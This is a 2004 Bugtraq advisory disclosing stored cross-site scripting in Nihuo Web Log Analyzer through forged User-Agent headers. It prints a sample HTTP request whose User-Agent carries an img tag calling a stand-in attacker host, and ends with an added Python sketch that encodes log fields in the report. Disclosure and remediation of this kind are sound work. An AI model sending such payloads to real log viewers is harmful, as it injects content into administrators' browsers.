Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer

From: Audun Larsen (larsen_at_xqus.com)
Date: 08/20/04

    Date: 20 Aug 2004 19:25:29 -0000
    To: bugtraq@securityfocus.com
    
    

    ---------------------------------------------------------------------------
              Cross-Site Scripting (XSS) in Nihuo Web Log Analyzer
    ---------------------------------------------------------------------------
    Author: Audun Larsen (larsen at xqus dot com)
    Date: Aug 20, 2004

    Affected software:
    ==================
    Name: Nihuo Web Log Analyzer
    URL: http://www.loganalyzer.net/index.html
    Version: v1.6 (older versions not tested)
    Released: Feb 17, 2004

    Vendor's description:
    =====================
    Nihuo Web Log Analyzer can generate a wide range of reports and statistics from your log file - more than 80 different reports with 2D and 3D graphs.

    Introduction:
    =============
    Most developers know that input validation is important. If you look at the history of PHP-Nuke, you can see that software that does not check
    user input thoroughly is insecure.

    Discussion:
    ===========
    Many think that HTTP access-log analyzers don't get any input from the user.
    But think about it: both the User-Agent and the Referer headers are data that can be manipulated by the user.
    Nihuo Web Log Analyzer is vulnerable to just this type of attack.

    Exploit:
    ========
    To exploit Nihuo Web Log Analyzer we have to send a special HTTP request that includes malicious code.

    GET / HTTP/1.1
    Host: sample.com
    Connection: close
    Accept: text/plain
    Accept-Language: en-us,en
    Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
    User-Agent: Some-Fake-UA <img src='http://attacker.host.com/app.gif'>

    Generating this HTTP request can easily be done in Perl, PHP or any other language. Generating enough hits with this user-agent will cause the
    user-agent to appear in the "Top Browsers" list, with the HTML code included. Notice that single quotes are used in the User-Agent.

    Tested with:
    ============
    Apache 1.3.x
    Nihuo Web Log Analyzer v1.6 (Running on Win2k)

    Solution:
    =========
    No solution available at the time of writing.
    Vendor notified Aug 20, 2004.

    Disclaimer:
    ===========
    The information in this advisory and any of its demonstrations is provided "as is" without warranty of any kind.

    Copyright 2004 Audun Larsen
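
The fix for the class of bug described in the Discussion section is to treat every log-derived field as untrusted and HTML-encode it when the report is written. The sketch below is an added example, not part of the original advisory and not Nihuo's code: it parses Apache combined-format lines, counts User-Agent values, and renders a "Top Browsers" table with encoding applied. The function names and the sample log lines are assumptions constructed for illustration; the same encoding applies to the Referer field.

```python
import html
import re
from collections import Counter

# Apache "combined" format; quoted fields may hold backslash-escaped characters.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] ' + QUOTED + r' \d{3} \S+ ' + QUOTED + ' ' + QUOTED + r'$'
)

# Constructed sample lines; the repeated agent mirrors the advisory's request.
SAMPLE_LOG = """\
192.0.2.10 - - [20/Aug/2004:19:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
192.0.2.11 - - [20/Aug/2004:19:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Some-Fake-UA <img src='http://attacker.host.com/app.gif'>"
192.0.2.11 - - [20/Aug/2004:19:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "Some-Fake-UA <img src='http://attacker.host.com/app.gif'>"
"""


def top_agents(log_text, n=10):
    """Count User-Agent values (raw, untrusted strings) across parseable lines."""
    counts = Counter()
    for line in log_text.splitlines():
        m = COMBINED.match(line.strip())
        if m:
            counts[m.group(3)] += 1  # group 3 is the User-Agent field
    return counts.most_common(n)


def render_top_browsers(rows):
    """Build the report table, HTML-encoding every log-derived value on output."""
    out = ["<table>", "<tr><th>Browser</th><th>Hits</th></tr>"]
    for agent, hits in rows:
        # quote=True also encodes ' and ", so the value is safe in attributes too.
        cell = html.escape(agent, quote=True)
        out.append(f"<tr><td>{cell}</td><td>{hits:d}</td></tr>")
    out.append("</table>")
    return "\n".join(out)


if __name__ == "__main__":
    print(render_top_browsers(top_agents(SAMPLE_LOG)))
```

With encoding applied at output time, the injected tag appears in the report as literal text instead of being interpreted by the browser of whoever views the statistics.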

